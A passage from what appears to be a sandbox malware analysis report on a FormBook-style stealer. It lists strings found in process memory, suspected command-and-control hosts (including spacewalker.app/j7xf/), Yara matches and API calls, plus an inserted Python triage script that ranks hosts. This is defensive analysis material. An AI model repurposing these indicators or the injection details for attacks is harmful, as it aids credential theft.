                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.rsbi.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.salesa.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.sencare.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.spacebuilders.net
                Source: nufnwZ9IW.exe, 00000010.00000002.3315893341.0000000005843000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.spacewalker.app
                Source: nufnwZ9IW.exe, 00000010.00000002.3315893341.0000000005843000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.spacewalker.app/j7xf/
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.stayplus.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.summergames.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.supercanal.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.swisshemp.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.taffix.net/binding
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.taquzhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.taquzhibo.net/binding
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.thebossclub.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.theflowerpot.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.thisit.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.urbanscout.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.wanyuezhibo.net
                Source: nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.workandhealth.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.wuhaozhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.wuyezhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.xianglizhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.xiaokongzhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.xiaoyingzhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.xingyezhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.xishizhibo.com
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.xiuchangzhibo.com
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.xiulizhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.xiumozhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.xiupazhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.xiyezhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.xuetuzhibo.com
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.yecaozhibo.com
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.yechuizhibo.com
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.yewuzhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.yueguangzhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.yumba.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.yundouzhibo.com
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.yundouzhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.yurenzhibo.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zeeshop.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://beian.miit.gov.cn/#/Integrated/index
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: EhStorAuthn.exe, 0000000F.00000002.3314587680.0000000006652000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.00000000042A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/?q=
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: EhStorAuthn.exe, 0000000F.00000002.3314587680.000000000600A000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000003C5A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://error.skycloud.tw/system/error?code=400
                Source: qmgr.db.17.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
                Source: svchost.exe, 00000011.00000003.1203275073.0000018565060000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://img.ucdl.pp.uc.cn/upload_files/wdj_web/public/img/favicon.ico
                Source: EhStorAuthn.exe, 0000000F.00000002.3312040086.0000000003574000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: EhStorAuthn.exe, 0000000F.00000002.3312040086.0000000003574000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: EhStorAuthn.exe, 0000000F.00000003.1278283817.000000000853D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: EhStorAuthn.exe, 0000000F.00000002.3312040086.0000000003574000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: EhStorAuthn.exe, 0000000F.00000002.3312040086.0000000003574000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: EhStorAuthn.exe, 0000000F.00000002.3312040086.0000000003574000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: EhStorAuthn.exe, 0000000F.00000002.3312040086.0000000003574000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://push.zhanzhang.baidu.com/push.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://ucan.25pp.com/Wandoujia_wandoujia_qrbinded.apk
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://white.anva.org.cn/
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.12377.cn/
                Source: 0t7MXNEfCg.exe, HrovwwypYVlFWB.exe.0.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20Y&
                Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://zzlz.gsxt.gov.cn/
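                Triage note on the URL rows above (added here as an editorial example; the script below is not Joe Sandbox output and not part of the sample). The rows mix three kinds of string: the long list of bare http://www.*.net hosts shared by the EhStorAuthn.exe and nufnwZ9IW.exe dumps, browser and OneDrive residue read while the stealer walked profile data (ecosia, duckduckgo, login.live.com), and a single host, http://www.spacewalker.app with the path /j7xf/, that appears only in dump 3315893341 of process 0x10 at 0x5843000, the same 0x40-protected dump whose base 0x57F0000 carries a FormBook Yara match further down. The script parses the rows, groups them by host, records which processes and what page protection each host was seen in, and ranks hosts with a simple heuristic: a real path segment, an executable-and-writable source region, a single source process and a plain-http scheme each raise the score. The ranking orders analyst attention; it is not a verdict on which host is the live C2, and the reading of the dump-name fields (pid, stage, dump id, address, protection) is an assumption made from the naming convention, with only pid, address and protection used. The sample rows are copied from this report; one is left in the fused form the extraction produced so that both forms parse.

```python
import re
from urllib.parse import urlsplit

# Rows copied from the report above (constructed subset, including one row in the fused
# "sdmpString found" form). They are data from this page, not live input.
SAMPLE_ROWS = """\
Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mishizhibo.net
Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.taquzhibo.net/binding
Source: nufnwZ9IW.exe, 00000010.00000002.3315893341.0000000005843000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.spacewalker.app
Source: nufnwZ9IW.exe, 00000010.00000002.3315893341.0000000005843000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.spacewalker.app/j7xf/
Source: EhStorAuthn.exe, 0000000F.00000002.3316757143.000000000855B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 0t7MXNEfCg.exe, HrovwwypYVlFWB.exe.0.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
"""

# A row: "Source: <sources> [|] String found in binary or memory: <url>". The separator is optional.
ROW_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*\|?\s*String found in binary or memory:\s*(?P<url>\S+)\s*$"
)
# A memory-dump name: <pid>.<stage>.<dumpid>.<address>.<protect>.<more fields>.sdmp
# Field meanings are an assumption drawn from the naming; only pid, addr and protect are used.
DUMP_RE = re.compile(
    r"^(?P<pid>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<dump>\d+)\.(?P<addr>[0-9A-F]{16})"
    r"\.(?P<protect>[0-9A-F]{8})(?:\.[0-9A-F]{8})*\.sdmp$"
)
PAGE_EXECUTE_READWRITE = 0x40  # Win32 memory-protection constant


def parse_sources(src):
    """Split the source column into (artifact_name, dump_info_or_None) pairs.

    A process name is followed by its dump name; dropped files (".dr") stand alone."""
    tokens = [t.strip() for t in src.split(",")]
    out, i = [], 0
    while i < len(tokens):
        name = tokens[i]
        m = DUMP_RE.match(tokens[i + 1]) if i + 1 < len(tokens) else None
        if m:
            out.append((name, {"pid": int(m["pid"], 16), "dump": int(m["dump"]),
                               "addr": int(m["addr"], 16), "protect": int(m["protect"], 16)}))
            i += 2
        else:
            out.append((name, None))
            i += 1
    return out


def parse_rows(text):
    """Yield (url, sources) for every row that matches the report layout."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append((m["url"], parse_sources(m["src"])))
    return rows


def triage(text):
    """Group URL strings by host: paths seen, schemes, source artifacts, pids and RWX origin."""
    hosts = {}
    for url, sources in parse_rows(text):
        u = urlsplit(url)
        host = u.hostname or url
        h = hosts.setdefault(host, {"paths": set(), "schemes": set(), "procs": set(),
                                    "pids": set(), "rwx": False})
        h["paths"].add(u.path)
        h["schemes"].add(u.scheme)
        for name, d in sources:
            h["procs"].add(name)
            if d:
                h["pids"].add(d["pid"])
                if d["protect"] & PAGE_EXECUTE_READWRITE:
                    h["rwx"] = True
    return hosts


def rank_c2_candidates(text):
    """Order hosts for analyst attention. Heuristic, not a verdict: a path segment, an RWX
    source region, a single source process and plain http each add to the score."""
    scored = []
    for host, h in triage(text).items():
        score = 0
        if any(p not in ("", "/") for p in h["paths"]):
            score += 2
        if h["rwx"]:
            score += 2
        if len(h["pids"]) == 1:
            score += 1
        if "http" in h["schemes"]:
            score += 1
        scored.append((score, host))
    scored.sort(key=lambda t: (-t[0], t[1]))
    return scored


if __name__ == "__main__":
    for score, host in rank_c2_candidates(SAMPLE_ROWS):
        print(f"{score:2d}  {host}")
```

Run against the full row set of this report the same parser separates the shared decoy-style host list from the one host carried only in the injected process's executable region; the next step for an analyst is to confirm that host against the report's DNS and HTTP traffic rather than trusting the score.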

                E-Banking Fraud

                Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000F.00000002.3311044242.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.3313948379.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1092434861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.3315893341.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1094683253.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1094905703.00000000044D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.3313869495.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.3313912525.0000000005FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Code function: 0_2_0163951C NtQueryInformationProcess,0_2_0163951C
                Source: C:\Users\user\Desktop\0t7MXNEfCg.exe | Code function: 0_2_01639AE8 NtQueryInformationProcess,0_2_01639AE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_0042C763 NtClose,7_2_0042C763
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2B60 NtClose,LdrInitializeThunk,7_2_00EF2B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 7_2_00EF2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_00EF2C70
